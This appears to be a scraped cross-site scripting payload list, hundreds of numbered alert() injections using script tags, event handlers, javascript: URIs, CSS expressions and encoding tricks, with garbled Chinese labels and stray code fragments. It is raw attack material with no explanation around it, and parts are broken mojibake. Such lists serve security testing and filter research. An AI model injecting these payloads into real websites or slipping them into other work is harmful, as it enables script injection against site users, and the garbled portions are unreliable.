medium--> ˫дÈƹý£ºript>alert(4) ´óСд»ìÏýÈƹý£º onmouseover=¡¯alert(9)¡¯ >"'> >"'>
"+alert(16)+" XSS Test XSS Test \x3Cscript>javascript:alert(352) '"`> --> --> --> --> --> `"'>

test test test test test test test test test test test test test test "'`>ABC
DEF "'`>ABC
DEF '`"><\x3Cscript>javascript:alert(392) '`"><\x00script>javascript:alert(393) "'`><\x3Cimg src=xxx:x onerror=javascript:alert(394)> "'`><\x00img src=xxx:x onerror=javascript:alert(395)> javascript:alert(400); javascript:alert(401); javascript:alert(402); javascript:alert(403); javascript:alert(404); javascript:alert(405); javascript:alert(406); ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test `"'> `"'> `"'> `"'> `"'> `"'> `"'> `"'> `"'> `"'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "/> "/> "/> "/> "/> "/> "/> "/> "/> javascript:alert(547) javascript:alert(548) javascript:alert(549) javascript:alert(550) javascript:alert(551) javascript:alert(552) javascript:alert(553) `"'> `"'> `"'> `"'> `"'> `"'> `"'> alert(583)0
"> "> "> "> <% foo>
XXX <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(636)></a>"> <!--[if]><script>javascript:alert(637)</script --> <!--[if<img src=x onerror=javascript:alert(638)//]> --> <object id="x" classid="clsid:CB927D6392-4FF7-4a9e-A63969-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C6397-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(639)" style="behavior:url(#x);"><param name=postdomevents /></object> <a style="-o-link:'javascript:javascript:alert(640)';-o-link-source:current">X <style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(641)'}{}*{-o-link-source:current}]{color:red};</style> <link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(642))%7d <style>@import "data:,*%7bx:expression(javascript:alert(643))%7D";</style> <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(644);">XXX</a></a><a href="javascript:javascript:alert(644)">XXX</a> <// style=x:expression\28javascript:alert(645)\29> <style>*{x:expression(javascript:alert(646))}</style> <div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(647));">X <script>({set/**/$($){_/**/setter=$,_=javascript:alert(648)}}).$=eval</script> <script>({0:#0=eval/#0#/#0#(javascript:alert(649))})</script> <script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(650)}),x</script> <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(651)')()</script> <meta charset="mac-farsi">¼script¾javascript:alert(652)¼/script¾ X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(653)` > 654<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh䙔vior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(654)>`> 655<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(655)>> 656<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(656) strokecolor=white strokeweight=656000px from=0 to=656000 /></a> <a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(657)">XXX</a> <event-source src="%(event)s" onload="javascript:alert(658)"> <a href="javascript:javascript:alert(659)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> <div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<img򡒴src=x:x򡒴onerror򡒴=javascript:alert(660)>"> <script>javascript:alert(661)</script> <IMG SRC="javascript:javascript:alert(662);"> <IMG SRC=javascript:javascript:alert(663)> <IMG SRC=`javascript:javascript:alert(664)`> <FRAMESET><FRAME SRC="javascript:javascript:alert(665);"></FRAMESET> <BODY ONLOAD=javascript:alert(666)> <BODY ONLOAD=javascript:javascript:alert(667)> <IMG SRC="jav ascript:javascript:alert(668);"> <BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(669)> <IMG SRC="javascript:javascript:alert(670)" <INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(671);"> <IMG DYNSRC="javascript:javascript:alert(672)"> <IMG LOWSRC="javascript:javascript:alert(673)"> <BGSOUND SRC="javascript:javascript:alert(674);"> <BR SIZE="&{javascript:alert(675)}"> <LINK REL="stylesheet" HREF="javascript:javascript:alert(676);"> <STYLE>li {list-style-image: url("javascript:javascript:alert(677)");}</STYLE><UL><LI>XSS <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(678);"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(679);"> <IFRAME SRC="javascript:javascript:alert(680);"></IFRAME> <TABLE BACKGROUND="javascript:javascript:alert(681)"> <TABLE><TD BACKGROUND="javascript:javascript:alert(682)"> <DIV STYLE="background-image: url(javascript:javascript:alert(683))"> <DIV STYLE="width:expression(javascript:alert(684));"> <IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(685))"> <XSS STYLE="xss:expression(javascript:alert(686))"> <STYLE TYPE="text/javascript">javascript:alert(687);</STYLE> <STYLE>.XSS{background-image:url("javascript:javascript:alert(688)");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:javascript:alert(689)")}</STYLE> <!--[if gte IE 4]><SCRIPT>javascript:alert(690);</SCRIPT><![endif]--> <BASE HREF="javascript:javascript:alert(691);//"> <OBJECT classid=clsid:ae24fdae-03c6-692692d692-8b76-0080c744f389><param name=url value=javascript:javascript:alert(692)></OBJECT> <HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(693)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(694)</SCRIPT>"></BODY></HTML> <form id="test" /><button form="test" formaction="javascript:javascript:alert(695)">X <body onscroll=javascript:alert(696)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> <P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(697)"> <STYLE>a{background:url('s698' 's2)}@import javascript:javascript:alert(698);');}</STYLE> <meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(699)&&;&&<&&/script&&> <SCRIPT onreadystatechange=javascript:javascript:alert(700);></SCRIPT> <style onreadystatechange=javascript:javascript:alert(701);></style> <?xml version="702.0"?><html:html xmlns:html='http://www.w3.org/702999/xhtml'><html:script>javascript:alert(702);</html:script></html:html> <embed code=javascript:javascript:alert(703);></embed> <frameset onload=javascript:javascript:alert(704)></frameset> <object onerror=javascript:javascript:alert(705)> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(706);">]]</C><X></xml> <IMG SRC=&{javascript:alert(707);};> <a href="javAascript:javascript:alert(708)">test708</a> <a href="javaascript:javascript:alert(709)">test709</a> <iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(710)&gt;>"> ';alert(711))//';alert(711))//"; alert(712))//";alert(712))//-- ></SCRIPT>">'><SCRIPT>alert(713))</SCRIPT> <IMG SRC="javascript:alert(714);"> <IMG SRC=javascript:alert(715)> <IMG SRC=JaVaScRiPt:alert(716)> <IMG SRC=javascript:alert(717)> <IMG SRC=`javascript:alert(718)`> <a onmouseover="alert(719)">xxs link</a> <a onmouseover=alert(720)>xxs link</a> <IMG """><SCRIPT>alert(721)</SCRIPT>"> <IMG SRC=javascript:alert(722))> <IMG SRC=# onmouseover="alert(723)"> <IMG SRC= onmouseover="alert(724)"> <IMG onmouseover="alert(725)"> <IMG SRC="jav ascript:alert(726);"> <IMG SRC="jav ascript:alert(727);"> <IMG SRC="jav ascript:alert(728);"> <IMG SRC="jav ascript:alert(729);"> perl -e 'print "<IMG SRC=java\0script:alert(730)>";' > out <IMG SRC="  javascript:alert(731);"> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(732)> <<SCRIPT>alert(733);//<</SCRIPT> <IMG SRC="javascript:alert(734)" \";alert(735);//
  • XSS

    exp/* ¼script¾alert(754)¼/script¾
    alert(766)'); ?> +ADw-SCRIPT+AD4-alert(768);+ADw-/SCRIPT+AD4- /*%00*/alert(770)/*%00*/
    < <"';alert(859))//\';alert(859))//";alert(859))//\";alert(859))//-->">'> ';alert(860))//\';alert(860))//";alert(860))//\";alert(860))//-->">'>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 &search=1 0&q=';alert(863))//\';alert%2?8863))//";alert(String.fromCharCode?(88,83,83))//\";alert(863)%?29//-->">'>&submit-frmGoogleWeb=Web+Search





    ...